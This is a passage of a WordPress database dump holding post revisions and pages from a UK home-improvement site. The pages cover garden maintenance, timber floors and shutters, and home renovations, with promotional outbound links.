perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-23 14:56:08','2019-09-23 14:56:08','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(223,1,'2019-09-23 14:56:19','2019-09-23 14:56:19','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals. At their hands, your lawn will look like a picture.\r\n<h3><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a> in your garden can be a difficult task.\r\n\r\nEspecially if they are causing problems such as blocking light for the growth of other plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger.\r\n\r\nSo it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-23 14:56:19','2019-09-23 14:56:19','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(224,1,'2019-09-24 08:04:57','2019-09-24 08:04:57','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals. At their hands, your lawn will look like a picture.\r\n<h3>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a> in your garden can be a difficult task.\r\n\r\nEspecially if they are causing problems such as blocking light for the growth of other plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger.\r\n\r\nSo it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-24 08:04:57','2019-09-24 08:04:57','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(225,1,'2019-09-24 08:05:54','2019-09-24 08:05:54','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals. At their hands, your lawn will look like a picture.\r\n<h3>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a> in your garden can be a difficult task.\r\n\r\nEspecially if they are causing problems such as blocking light from plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger.\r\n\r\nSo it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-24 08:05:54','2019-09-24 08:05:54','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(226,1,'2019-09-24 08:07:38','2019-09-24 08:07:38','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals. At their hands, your lawn will look like a picture.\r\n<h3>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a> in your garden can be a difficult task.\r\n\r\nEspecially if they are causing problems such as blocking light from plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger.\r\n\r\nSo it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-24 08:07:38','2019-09-24 08:07:38','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(229,1,'2019-10-01 10:51:22','2019-10-01 10:51:22','','plumbing3','','inherit','closed','closed','','plumbing3','','','2019-10-01 10:51:22','2019-10-01 10:51:22','',0,'http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing3.jpg',0,'attachment','image/jpeg',0),(230,1,'2019-10-01 10:51:23','2019-10-01 10:51:23','','plumbing2','','inherit','closed','closed','','plumbing2','','','2019-10-01 10:51:23','2019-10-01 10:51:23','',0,'http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing2.jpg',0,'attachment','image/jpeg',0),(231,1,'2019-10-01 10:51:24','2019-10-01 10:51:24','','plumbing1','','inherit','closed','closed','','plumbing1','','','2019-10-01 10:51:24','2019-10-01 10:51:24','',0,'http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing1.jpg',0,'attachment','image/jpeg',0),(232,1,'2019-10-01 10:51:25','2019-10-01 10:51:25','','plumbing','','inherit','closed','closed','','plumbing','','','2019-10-01 10:51:25','2019-10-01 10:51:25','',0,'http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing.jpg',0,'attachment','image/jpeg',0),(233,1,'2019-10-01 10:51:25','2019-10-01 10:51:25','','plumber','','inherit','closed','closed','','plumber','','','2019-10-01 10:51:25','2019-10-01 10:51:25','',0,'http://housing-today.co.uk/wp-content/uploads/2019/10/plumber.jpg',0,'attachment','image/jpeg',0),(234,1,'2019-10-01 10:52:55','2019-10-01 10:52:55','','plumbing4','','inherit','closed','closed','','plumbing4','','','2020-08-20 14:06:30','2020-08-20 14:06:30','',0,'http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing4.jpg',0,'attachment','image/jpeg',0),(242,1,'2019-12-18 10:24:25','2019-12-18 10:24:25','If there are two things homeowners and even prospective buyers want from their property it\'s to add value and increase the privacy to their property. And who can really blame them?\r\n\r\nPrivacy in your home is a must-have.\r\n\r\nIt helps you to feel safe and secure and allows you to go about your business without the fear of nosy bypassers peering through.\r\n\r\nSo, why not <a href=\"https://www.propertypriceadvice.co.uk/home-improvements/ten-of-the-best-ways-to-add-value-to-your-home\">add value</a> to your home and <a href=\"https://www.netmums.com/coffeehouse/home-garden-194/cleaning-14/994558-i-dont-feel-safe-my-own-home.html\">increase its privacy</a> at the same time?\r\n\r\nAnd believe it or not, it can be done without even breaking the bank. Here\'s how...\r\n<h2>1. Timber Floors</h2>\r\n<strong>60% Off Timber Floors | Premium Flooring Products</strong>\r\n\r\nThere are no other flooring products that actually compare to timber floors. In comparison to carpet, which only lasts at most 15 years, timber floors actually will last over 100. This means that there is nothing more durable on the market, or <a href=\"https://heartwoodfloors.com.au/flooring-products/\" target=\"_blank\">nothing as stylish</a>.\r\n\r\nOn top of this, timber floors require little to no maintenance whatsoever and are incredibly easy to clean.\r\n\r\nThis is because they don\'t store dirt like carpet and adds a great touch of premium quality to your home, which can make it feel more expensive.\r\n\r\nTimber floors are also a great natural and sustainable material, unlike other floor coverings, which take their toll on nature.\r\n\r\n \r\n<h4>Benefits of hardwood flooring:</h4>\r\n<ul>\r\n <li>Easy to maintain</li>\r\n <li>Long-lasting</li>\r\n <li>Easy to clean</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-243\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg\" alt=\"\" width=\"2254\" height=\"1500\" />\r\n<h2>2. Wood or timber Shutters Anyone?</h2>\r\nAnother sustainable resource is timber shutters. They are a great extra layer for privacy and protection and are great at keeping out cold air as well as hot heats in the summertime.\r\n\r\nThey have warm, natural tones, which will make your home look more expensive and can fit any style from traditional to modern and is truly timeless.\r\n\r\nAnd when it comes to colour choices and complete customisation the choice is endless, which means that you will find something perfect for you.\r\n\r\nAs they are very easy to maintain and keep clean, all you will need to do is vacuum or dust the blinds every other week to remove dust.\r\n\r\nBenefits of timber shutters include Low maintenance, Added privacy and protection and are v easy to keep clean. <a href=\"https://www.heartwoodshutters.com.au/products/timber-shutters/\" target=\"_blank\">More here.</a>\r\n<h2>3. Other ways to add value to your home</h2>\r\n<ul>\r\n <li>Loft conversions</li>\r\n <li>Apply for planning permission</li>\r\n <li>Take care of your garden and exterior with landscaping</li>\r\n <li>Makeover your bathroom</li>\r\n</ul>','How to add value and privacy to your home','','publish','closed','closed','','add-value-privacy-home','','','2019-12-18 18:08:36','2019-12-18 18:08:36','',245,'https://housing-today.co.uk/?page_id=242',0,'page','',0),(243,1,'2019-12-18 10:22:17','2019-12-18 10:22:17','','pexels-photo-164005','','inherit','closed','closed','','pexels-photo-164005','','','2019-12-18 10:22:17','2019-12-18 10:22:17','',242,'http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg',0,'attachment','image/jpeg',0),(244,1,'2019-12-18 10:24:25','2019-12-18 10:24:25','If there are two things homeowners and even prospective buyers want from their property it\'s to add value and increase the privacy to their property. And who can really blame them?\r\n\r\n \r\n\r\nPrivacy in your home is a must-have.\r\n\r\nIt helps you to feel safe and secure and allows you to go about your business without the fear of nosy bypassers peering through.\r\n\r\nSo, why not <a href=\"https://www.propertypriceadvice.co.uk/home-improvements/ten-of-the-best-ways-to-add-value-to-your-home\">add value</a> to your home and <a href=\"https://www.netmums.com/coffeehouse/home-garden-194/cleaning-14/994558-i-dont-feel-safe-my-own-home.html\">increase its privacy</a> at the same time?\r\n\r\nAnd believe it or not, it can be done without even breaking the bank. Here\'s how...\r\n<h2>1. Timber Floors</h2>\r\nThere are no other flooring products that actually compare to <a href=\"https://www.heartwoodfloors.com.au/\">timber floors</a>. In comparison to carpet, which only lasts at most 15 years, timber floors actually will last over 100. This means that there is nothing more durable on the market, or nothing as stylish.\r\n\r\nOn top of this, timber floors require little to no maintenance whatsoever and are incredibly easy to clean.\r\n\r\nThis is because they don\'t store dirt like carpet and adds a great touch of premium quality to your home, which can make it feel more expensive.\r\n\r\nTimber floors are also a great natural and sustainable material, unlike other floor coverings, which take their toll on nature.\r\n\r\n \r\n<h3></h3>\r\n<h4>Benefits of hardwood flooring:</h4>\r\n<ul>\r\n <li>Easy to maintain</li>\r\n <li>Long-lasting</li>\r\n <li>Easy to clean</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-243\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg\" alt=\"\" width=\"2254\" height=\"1500\" />\r\n<h2>2. Timber Shutters</h2>\r\nAnother sustainable resource is <a href=\"https://www.heartwoodshutters.com.au/products/timber-shutters/\">timber shutters</a>. They are a great extra layer for privacy and protection and are great at keeping out cold air as well as hot heats in the summertime.\r\n\r\nThey have warm, natural tones, which will make your home look more expensive and can fit any style from traditional to modern and is truly timeless.\r\n\r\nAnd when it comes to <a href=\"https://housing.com/news/guide-choosing-great-colours-home/\">colour choices</a> and complete customisation the choice is endless, which means that you will find something perfect for you.\r\n\r\nAs they are very easy to maintain and keep clean, all you will need to do is vacuum or dust the blinds every other week to remove dust.\r\n\r\n \r\n<div id=\"tgcm_content_toggle_content1\" class=\"toggle_content\"></div>\r\n<h4>Benefits of timber shutters:</h4>\r\n<ul>\r\n <li>Low maintenance</li>\r\n <li>Added privacy and protection</li>\r\n <li>Easy to keep clean</li>\r\n</ul>\r\n<h2>3. Other ways to add value to your home</h2>\r\n<ul>\r\n <li>Loft conversions</li>\r\n <li>Apply for planning permission</li>\r\n <li>Take care of your garden and exterior with landscaping</li>\r\n <li>Makeover your bathroom</li>\r\n</ul>','How to add value and privacy to your home','','inherit','closed','closed','','242-revision-v1','','','2019-12-18 10:24:25','2019-12-18 10:24:25','',242,'https://housing-today.co.uk/blog/242-revision-v1',0,'revision','',0),(245,1,'2019-12-18 10:24:59','2019-12-18 10:24:59','','Home Interior','','publish','closed','closed','','home-interior','','','2019-12-18 10:24:59','2019-12-18 10:24:59','',0,'https://housing-today.co.uk/?page_id=245',0,'page','',0),(246,1,'2019-12-18 10:24:59','2019-12-18 10:24:59','','Home Interior','','inherit','closed','closed','','245-revision-v1','','','2019-12-18 10:24:59','2019-12-18 10:24:59','',245,'https://housing-today.co.uk/blog/245-revision-v1',0,'revision','',0),(247,1,'2019-12-18 10:25:10','2019-12-18 10:25:10','If there are two things homeowners and even prospective buyers want from their property it\'s to add value and increase the privacy to their property. And who can really blame them?\r\n\r\nPrivacy in your home is a must-have.\r\n\r\nIt helps you to feel safe and secure and allows you to go about your business without the fear of nosy bypassers peering through.\r\n\r\nSo, why not <a href=\"https://www.propertypriceadvice.co.uk/home-improvements/ten-of-the-best-ways-to-add-value-to-your-home\">add value</a> to your home and <a href=\"https://www.netmums.com/coffeehouse/home-garden-194/cleaning-14/994558-i-dont-feel-safe-my-own-home.html\">increase its privacy</a> at the same time?\r\n\r\nAnd believe it or not, it can be done without even breaking the bank. Here\'s how...\r\n<h2>1. Timber Floors</h2>\r\nThere are no other flooring products that actually compare to <a href=\"https://www.heartwoodfloors.com.au/\">timber floors</a>. In comparison to carpet, which only lasts at most 15 years, timber floors actually will last over 100. This means that there is nothing more durable on the market, or nothing as stylish.\r\n\r\nOn top of this, timber floors require little to no maintenance whatsoever and are incredibly easy to clean.\r\n\r\nThis is because they don\'t store dirt like carpet and adds a great touch of premium quality to your home, which can make it feel more expensive.\r\n\r\nTimber floors are also a great natural and sustainable material, unlike other floor coverings, which take their toll on nature.\r\n\r\n \r\n<h3></h3>\r\n<h4>Benefits of hardwood flooring:</h4>\r\n<ul>\r\n <li>Easy to maintain</li>\r\n <li>Long-lasting</li>\r\n <li>Easy to clean</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-243\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg\" alt=\"\" width=\"2254\" height=\"1500\" />\r\n<h2>2. Timber Shutters</h2>\r\nAnother sustainable resource is <a href=\"https://www.heartwoodshutters.com.au/products/timber-shutters/\">timber shutters</a>. They are a great extra layer for privacy and protection and are great at keeping out cold air as well as hot heats in the summertime.\r\n\r\nThey have warm, natural tones, which will make your home look more expensive and can fit any style from traditional to modern and is truly timeless.\r\n\r\nAnd when it comes to <a href=\"https://housing.com/news/guide-choosing-great-colours-home/\">colour choices</a> and complete customisation the choice is endless, which means that you will find something perfect for you.\r\n\r\nAs they are very easy to maintain and keep clean, all you will need to do is vacuum or dust the blinds every other week to remove dust.\r\n\r\n \r\n<div id=\"tgcm_content_toggle_content1\" class=\"toggle_content\"></div>\r\n<h4>Benefits of timber shutters:</h4>\r\n<ul>\r\n <li>Low maintenance</li>\r\n <li>Added privacy and protection</li>\r\n <li>Easy to keep clean</li>\r\n</ul>\r\n<h2>3. Other ways to add value to your home</h2>\r\n<ul>\r\n <li>Loft conversions</li>\r\n <li>Apply for planning permission</li>\r\n <li>Take care of your garden and exterior with landscaping</li>\r\n <li>Makeover your bathroom</li>\r\n</ul>','How to add value and privacy to your home','','inherit','closed','closed','','242-revision-v1','','','2019-12-18 10:25:10','2019-12-18 10:25:10','',242,'https://housing-today.co.uk/blog/242-revision-v1',0,'revision','',0),(248,1,'2019-12-18 12:37:29','2019-12-18 12:37:29','<h3 class=\"alignnone\"><img class=\"aligncenter size-full wp-image-249\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-2098443.jpeg\" alt=\"\" width=\"2250\" height=\"1500\" /></h3>\r\n<h3 class=\"alignnone\">Do you wish you could create a fresh new living space and environment without the hassle of packing up and moving?</h3>\r\nHome renovations and refurbishments have the ability to do exactly this - leaving you stress-free.\r\n\r\nCustom builders, who take on home renovation projects take care of everything from design to execution and it\'s all managed under one company.\r\n\r\nSo, you can feel ensured that the renovation will be handled properly and every detail will be taken care of. It also means that you will have the freedom to be creative and design what will be your dream home, without having to build it from scratch.\r\n\r\nHere, we\'ll let you know the two home renovation projects you can take on that will add the most value to your home. Scroll below...\r\n<h3><strong>What is a renovation?</strong></h3>\r\nTaking on a renovation project doesn\'t have to translate to remodelling the entire house. It can simply mean upgrading things like flooring, giving the place a fresh lick of paint and improving your electrics.\r\n\r\nBelieve it or not, but flooring is actually majorly overlooked when it comes to renovations and this can be because it can be very costly. But there are ways to <a href=\"https://abeautifulmess.com/2018/03/ways-to-save-money-on-a-home-renovation.html\">cut corners</a>.\r\n\r\nYou don\'t need to fit a brand new floor around the house to give your property a fresh new look.\r\n\r\nSo, why not instead have your flooring and carpets cleaned professionally to make them feel like brand new?\r\n\r\nWhen it comes to having your carpets cleaned make sure to track down reputable carpet cleaners that will be able to <a href=\"https://www.freshairecarpetcleaning.com.au/services/rental-properties-carpet-tile-cleaning/\" target=\"_blank\">offer you specialist advice</a> leaving you feeling ensured that you will receive the best service.\r\n\r\nProfessional carpet cleaners can help you:\r\n<ul>\r\n <li>Remove stains</li>\r\n <li>Fight away odours</li>\r\n <li>Clean tiles & grouting</li>\r\n <li>Help protect from future stains</li>\r\n</ul>\r\n<img class=\"alignleft size-full wp-image-250\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo.jpg\" alt=\"\" width=\"25%\" height=\"1500\" />Complete renovations, for example fitting a new kitchen, can set you back at least £30,000 and can be an unnecessary cost.\r\n\r\nHome renovations and improvements are about making use of the space you have, for example, if you want extra space why not make more room in your house by knocking down walls or adding a loft conversion rather than moving.\r\n\r\n<a href=\"https://www.sovereignhomes.com.au/testimonials/\">Renovation builders</a> provide a straight-forward solution and service that will take care of everything right from the initial stages.\r\n\r\nThese home builders are there for their clients 100% and are on hand to supply advice and help with decision making when it comes to making cost-effecting changes.\r\n<h3>Custom Builders</h3>\r\nThere are many professional companies that specialise in custom builds and renovations, who are there to assist you if you\'re looking to upgrade and <a href=\"https://brightside.me/creativity-home/10-cool-interior-design-tricks-to-transform-your-house-359310/\">transform your home</a> on a budget.\r\n\r\nCustom home builders can help you makeover your space in a modern way and will be there to cover every aspect and work to all standards. They will be there to keep your project organised and ensure the working process is smooth by conferring with consultants and specialists.\r\n\r\nAll you will need to do is <a href=\"https://www.apartmenttherapy.com/mapping-out-your-dream-house-4-questions-to-ask-yourself-212499\">envision your dream home</a> and even choose the materials and supplies if you wish to be more involved.','What home renovations add the most value?','','publish','closed','closed','','home-renovations-add-value','','','2019-12-18 17:39:50','2019-12-18 17:39:50','',245,'https://housing-today.co.uk/?page_id=248',0,'page','',0),(249,1,'2019-12-18 12:31:16','2019-12-18 12:31:16','','staircase','','inherit','closed','closed','','pexels-photo-2098443','','','2019-12-18 12:32:08','2019-12-18 12:32:08','',248,'http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-2098443.jpeg',0,'attachment','image/jpeg',0),(250,1,'2019-12-18 12:33:27','2019-12-18 12:33:27','','build','','inherit','closed','closed','','pexels-photo','','','2019-12-18 12:33:40','2019-12-18 12:33:40','',248,'http://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo.jpg',0,'attachment','image/jpeg',0),(251,1,'2019-12-18 12:37:29','2019-12-18 12:37:29','<h3>Do you wish you could create a fresh new living space and environment without the hassle of packing up and moving?</h3>\r\nHome renovations and refurbishments have the ability to do exactly this - leaving you stress-free.\r\n\r\nCustom builders, who take on home renovation projects take care of everything from design to execution and it\'s all managed under one company.\r\n\r\nSo, you can feel ensured that the renovation will be handled properly and every detail will be taken care of. It also means that you will have the freedom to be creative and design what will be your dream home, without having to build it from scratch.\r\n\r\nHere, we\'ll let you know the two home renovation projects you can take on that will add the most value to your home. Scroll below...\r\n<h3><strong>What is a renovation?</strong></h3>\r\nTaking on a renovation project doesn\'t have to translate to remodelling the entire house. It can simply mean upgrading things like flooring, giving the place a fresh lick of paint and improving your electrics.\r\n\r\nBelieve it or not, but flooring is actually majorly overlooked when it comes to renovations and this can be because it can be very costly. But there are ways to <a href=\"https://abeautifulmess.com/2018/03/ways-to-save-money-on-a-home-renovation.html\">cut corners</a>.\r\n\r\nYou don\'t need to fit a brand new floor around the house to give your property a fresh new look.\r\n\r\nSo, why not instead have your flooring and carpets cleaned professionally to make them feel like brand new?\r\n\r\nWhen it comes to having your carpets cleaned make sure to track down reputable carpet cleaners that will be able to offer you specialist advice leaving you feeling ensured that you will receive the best service.\r\n\r\n<a href=\"https://www.freshairecarpetcleaning.com.au/\">Professional carpet cleaners</a> can help you:\r\n<ul>\r\n <li>Remove stains</li>\r\n <li>Fight away odours</li>\r\n <li>Clean tiles & grouting</li>\r\n 